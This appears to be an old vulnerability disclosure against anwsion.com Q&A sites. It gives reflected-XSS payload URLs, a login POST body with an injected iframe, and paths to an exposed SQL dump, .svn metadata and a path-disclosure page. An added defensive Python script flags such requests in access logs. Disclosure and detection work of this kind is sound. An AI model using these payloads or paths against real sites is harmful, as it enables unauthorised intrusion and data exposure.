### Brief description:
If this gets ignored again, I'll burst into tears.
### Details:
1. XSS
```
http://wenda.anwsion.com/home/explore/category-3%22%3E%3Ciframe%20src=//www.baidu.com%3E
http://wenda.anwsion.com/home/explore/page-5__sort_type-hot__category-3_%22%3E%3Ciframe%20onload=alert(/xss/)%3E-1
http://wenda.anwsion.com/search/q-MTwvdGl0bGU+MTxTY1JpUHQgPmFsZXJ0KC94c3MvKTwvU2NSaVB0Pg==#all
http://dev.anwsion.com/?q="><iframe onload=alert(/xss/)>
http://dev.anwsion.com/?act=login
POST:password=password&referer="><iframe onload=alert(1)>&username=hehe
```
2. Database information leak
http://dev.anwsion.com/sql/install/database.sql
3. Path disclosure
http://dev.anwsion.com/i/?act=getentry&page[]=1
4. SVN
http://static.anwsion.com/.svn/entries
http://static.anwsion.com/admin/.svn/entries
5. SQL injection (see images)
### Proof of vulnerability:
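
For triaging access logs against items 1, 2 and 4 above, the following added example (not part of the original report) labels requests that carry HTML markup, including markup hidden in a base64 path value like the `/search/q-...` request, and requests for `.svn` metadata or `.sql` dumps. The function names and label names are hypothetical; the sample requests are taken from the report, plus one constructed benign request.

```python
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

MARKUP = re.compile(r'[<>"]')  # characters needed to break out of an HTML context
EXPOSED = re.compile(r'(^|/)\.svn(/|$)|\.sql$', re.IGNORECASE)  # VCS metadata, SQL dumps


def b64_text(token):
    """Return the decoded text if token is well-formed base64, else None."""
    if len(token) < 8 or len(token) % 4:
        return None
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, ValueError):
        return None


def triage(url, body=""):
    """Return a sorted list of labels for one request (label names are hypothetical)."""
    parts = urlsplit(url)
    labels = set()
    if EXPOSED.search(unquote(parts.path)):
        labels.add("exposed-file")
    # Percent-decode path, query and form body before looking for markup.
    if MARKUP.search(unquote(parts.path + "?" + parts.query + "&" + body)):
        labels.add("markup")
    # A value such as /search/q-<base64> hides its markup from the check above.
    for segment in parts.path.split("/"):
        text = b64_text(segment.partition("-")[2])
        if text and MARKUP.search(text):
            labels.add("base64-markup")
    return sorted(labels)


SAMPLES = [  # (url, POST body); all from the report except the last entry
    ("http://wenda.anwsion.com/home/explore/category-3%22%3E%3Ciframe%20src=//www.baidu.com%3E", ""),
    ("http://wenda.anwsion.com/search/q-MTwvdGl0bGU+MTxTY1JpUHQgPmFsZXJ0KC94c3MvKTwvU2NSaVB0Pg==#all", ""),
    ("http://dev.anwsion.com/?act=login", 'password=password&referer="><iframe onload=alert(1)>&username=hehe'),
    ("http://dev.anwsion.com/sql/install/database.sql", ""),
    ("http://static.anwsion.com/admin/.svn/entries", ""),
    ("http://wenda.anwsion.com/home/explore/category-3", ""),  # constructed benign request
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(triage(url, body), url)
```

The labels mark requests for review, not confirmed exploitation; the fix for item 1 remains context-aware output encoding in the application.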
[![](https://images.seebug.org/upload/201210/16214329a82c2de5f0fa7fb98781a2eaf1c1c5b2.jpg)](https://images.seebug.org/upload/201210/16214329a82c2de5f0fa7fb98781a2eaf1c1c5b2.jpg)
[![](https://images.seebug.org/upload/201210/1621431822d99cc088cff9e0762dc129933404ee.jpg)](https://images.seebug.org/upload/201210/1621431822d99cc088cff9e0762dc129933404ee.jpg)
[![](https://images.seebug.org/upload/201210/16214311bf7e65fccc4940778b6b9a2a0e07f780.jpg)](https://images.seebug.org/upload/201210/16214311bf7e65fccc4940778b6b9a2a0e07f780.jpg)
[![](https://images.seebug.org/upload/201210/16214306b4f81363c91aad8fd70bbe16cc3f8d8c.jpg)](https://images.seebug.org/upload/201210/16214306b4f81363c91aad8fd70bbe16cc3f8d8c.jpg)
[![](https://images.seebug.org/upload/201210/16214301f3ebd6517484c4a726b585ecfc5d9501.jpg)](https://images.seebug.org/upload/201210/16214301f3ebd6517484c4a726b585ecfc5d9501.jpg)
[![](https://images.seebug.org/upload/201210/162142569393761ba6178f7e733320f21b44dd75.jpg)](https://images.seebug.org/upload/201210/162142569393761ba6178f7e733320f21b44dd75.jpg)
[![](https://images.seebug.org/upload/201210/16214251133650f2f90fb1140449da4dcc9a4b1b.jpg)](https://images.seebug.org/upload/201210/16214251133650f2f90fb1140449da4dcc9a4b1b.jpg)
[![](https://images.seebug.org/upload/201210/162142409b6016f6e84fc9de2ead295e61f82316.jpg)](https://images.seebug.org/upload/201210/162142409b6016f6e84fc9de2ead295e61f82316.jpg)